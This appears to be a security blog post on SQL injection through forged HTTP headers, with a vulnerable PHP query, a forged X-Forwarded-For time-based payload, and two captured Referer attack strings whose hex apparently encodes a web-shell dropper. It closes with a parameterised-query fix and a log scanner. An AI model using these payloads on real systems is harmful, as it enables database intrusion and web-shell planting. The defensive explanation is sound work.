SQL Injection: HTTP header

2019-03-08 10:34

Forging the data carried in HTTP headers to perform SQL injection.

X-Forwarded-For SQL injection
Roughly speaking:
if there is a query like this:
SELECT username, password FROM users-data WHERE username='".sanitize($_POST['username'])."'
AND password='".md5($_POST['password'])."' AND ip_adr='".ipadr()


the client sends a forged X-Forwarded-For value,
something like:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) ...........
X-Forwarded-For: "XOR(if(now()=sysdate(),sleep(6),0))OR"
X-Requested-With: XMLHttpRequest
Referer: http://internal.customer.info/
Host: internal.customer.info
Connection: close
Accept-Encoding: gzip,deflate
Accept: */*

Of course User-Agent, Referer and cookies can all be forged as well,
leaving the server exposed to SQL injection.
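In the query above the username goes through sanitize() and the password through md5(), but whatever ipadr() returns is concatenated straight into the SQL text, and when ipadr() reads X-Forwarded-For that string is written by the client. The following is an added example, not code from the original post: the same lookup in Python on an in-memory sqlite3 table (constructed data), once built by concatenation like the PHP query and once with bound parameters. The users table, the `client_ip` stand-in for ipadr() and the `FORGED_XFF` value are all assumptions made for the demonstration.

```python
import sqlite3

# Added example, not the post's code. A tiny users table (constructed data)
# and the same lookup written two ways: concatenated like the PHP query in the
# post, and with bound parameters. Password hashing is left out; it is
# irrelevant to the injection, which rides in on the IP string.

def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, ip_adr TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'x', '10.0.0.5')")
    db.commit()
    return db

def client_ip(headers, remote_addr):
    # Stand-in for the post's ipadr(): prefers X-Forwarded-For when present.
    # That header is written by the client, so it is untrusted input, exactly
    # like $_POST['username'].
    return headers.get("X-Forwarded-For", remote_addr)

def lookup_unsafe(db, username, password, headers, remote_addr):
    # Vulnerable: the header value is spliced into the SQL text, so a quote in
    # it ends the ip_adr literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s' "
           "AND ip_adr='%s'" % (username, password, client_ip(headers, remote_addr)))
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, username, password, headers, remote_addr):
    # Hardened: placeholders; the driver passes the header value as data, so
    # quotes and keywords inside it cannot change the query.
    sql = "SELECT username FROM users WHERE username=? AND password=? AND ip_adr=?"
    params = (username, password, client_ip(headers, remote_addr))
    return [row[0] for row in db.execute(sql, params)]

# Constructed forged header value: closes the ip_adr literal and appends a
# condition that is always true.
FORGED_XFF = "' OR '1'='1"

if __name__ == "__main__":
    db = build_db()
    forged = {"X-Forwarded-For": FORGED_XFF}
    # Wrong password, forged header: the concatenated query still matches alice.
    print("unsafe:", lookup_unsafe(db, "alice", "wrong", forged, "198.51.100.1"))  # ['alice']
    # Same input through the parameterised query: no row.
    print("safe:  ", lookup_safe(db, "alice", "wrong", forged, "198.51.100.1"))    # []
```

The point of the pair is that the fix is not another sanitize() call on the IP string but removing string concatenation altogether; with placeholders the sqlite driver (or MySQL's prepared statements in the PHP case) never interprets the header value as SQL.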


Other references
HDWiki v6.0 latest version Referer injection vulnerability (HDWiki v6.0最新版referer注入漏洞)
This one covers a Referer SQL injection case.

SQL Injection: HTTP header injection (SQL注入:Http header injection)
This one covers a User-Agent SQL injection case.


2019-04-12
Noticed in the system logs that the Referer had been set to:

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}


554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:1480:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a793476615731685a32567a4c335677624739685a43396d6457356a64476c7662693570626d4d75634768774a79786959584e6c4e6a52665a47566a6232526c4b43645152446c3359556842353306c445157644a5230357a5756684f656b6c46526a64446155466e53554e425a306c445157644a5130466e5355686161474e705157746b52315a365a454e424f556c44536d7461567a46325357707a53306c445157644a5130466e53554e425a306c4451576461626c5a3157544e53634749794e4764594d546c72576c684f4d474e75566d706b513264775a5864765a306c445157644a5130466e53554e425a306c445157644a5130466e53554e425a306c46516d786b62555a7a53304e534d4746486248704d56445577576c684f4d4574556330744a5130466e53554e425a306c445157644a5130466e5a6c46765a306c445157646d5557396e53554e425a307049556d786a4d31466e55464e4361566c59546d784f616c4a6d576b6457616d4979556d784c51314a6d5655553556465a476332356a4d314a355a46646b626d4a48565735595532733351326c425a306c445157746952315a31535551775a324d7a556e6c6952315a3153304e534d467059546a424c55334e34543364765a306c445157644b53454a33535551775a306c724f445a4e5648426a5357744759306c7162336850626e5236543270524e6c684453436a42615745347757454e4a4e324e3662326c4d61564a7a576c633064556c7163474e4a61556c31536b685362474d7a5558564a616e526a535770304f556c716330744a5130466e53554e534d467059546a42594d315a31597a4a5765556c454d47646b567a5636576c684b63466c576548426c62565676536b684364307445563307451656a51394a796b702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
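Both log entries share the same shape: a PHP-serialized array carrying a `union select` with a very long hex literal and comment markers, sent in a header the application apparently stored or echoed into a query. That shape is easy to pick out of access logs. The following is an added example, not the post's code: a scanner run over constructed Apache-style log lines. It assumes (my assumption, not stated in the post) a LogFormat that appends `%{X-Forwarded-For}i` as a last quoted field after the User-Agent, and that Apache escapes double quotes in header values as `\"`, which it does in the default CustomLog output. The sample lines, IPs and the shortened serialized payload are constructed.

```python
import re

# Added example, not from the original post. Constructed log lines in an
# Apache-style format whose LogFormat (assumption) appends the
# X-Forwarded-For header as a final quoted field after the User-Agent.
# Apache escapes double quotes inside a logged header value as \".
SAMPLE_LOG = r'''
203.0.113.7 - - [12/Apr/2019:09:15:02 +0800] "GET /index.php HTTP/1.1" 200 5120 "http://example.test/" "Mozilla/5.0" "-"
203.0.113.9 - - [12/Apr/2019:09:15:40 +0800] "GET /index.php HTTP/1.1" 200 5120 "a:2:{s:3:\"num\";s:51:\"*/ union select 1,0x48656c6c6f2c20776f726c64,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/5.0" "-"
203.0.113.11 - - [12/Apr/2019:09:16:05 +0800] "GET / HTTP/1.1" 200 4096 "http://internal.customer.info/" "Mozilla/5.0" "\"XOR(if(now()=sysdate(),sleep(6),0))OR\""
'''

# A quoted field is any run of non-quote characters or backslash escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)" '
    r'"(?P<xff>(?:[^"\\]|\\.)*)"$'
)

# Indicators drawn from the payload shapes in the post: SQL keywords and
# time-based functions, comment markers used to splice into a query, a
# PHP-serialized array, and an unusually long hex literal.
INDICATORS = [
    ("sql-keyword", re.compile(
        r'\bunion\s+(?:all\s+)?select\b|\b(?:sleep|benchmark|sysdate)\s*\(|\binformation_schema\b',
        re.I)),
    ("sql-comment", re.compile(r'--\s|/\*|\*/')),
    ("php-serialized", re.compile(r'\ba:\d+:\{s:\d+:')),
    ("long-hex-literal", re.compile(r'0x[0-9a-fA-F]{16,}')),
]

def scan_log(text):
    """Return one finding per (line, header field) whose value trips an indicator.

    Lines that do not match the expected format are reported as 'unparsed'
    rather than silently dropped, so a log format change is noticed.
    """
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            findings.append({"ip": None, "field": "unparsed", "indicators": [], "value": line})
            continue
        for field in ("referer", "ua", "xff"):
            value = m.group(field)
            hits = [name for name, rx in INDICATORS if rx.search(value)]
            if hits:
                findings.append({"ip": m.group("ip"), "field": field,
                                 "indicators": hits, "value": value})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["field"], f["indicators"], f["value"][:60])
```

Header fields are scanned separately from the request line because the request is usually already covered by a WAF or URL-based rule, while Referer, User-Agent and X-Forwarded-For are exactly the fields the post shows being abused and are the ones most log reviews skip. Treat the indicator list as a starting point: `--` followed by whitespace and `/*` will occasionally appear in legitimate referers, so the output is for triage, not blocking.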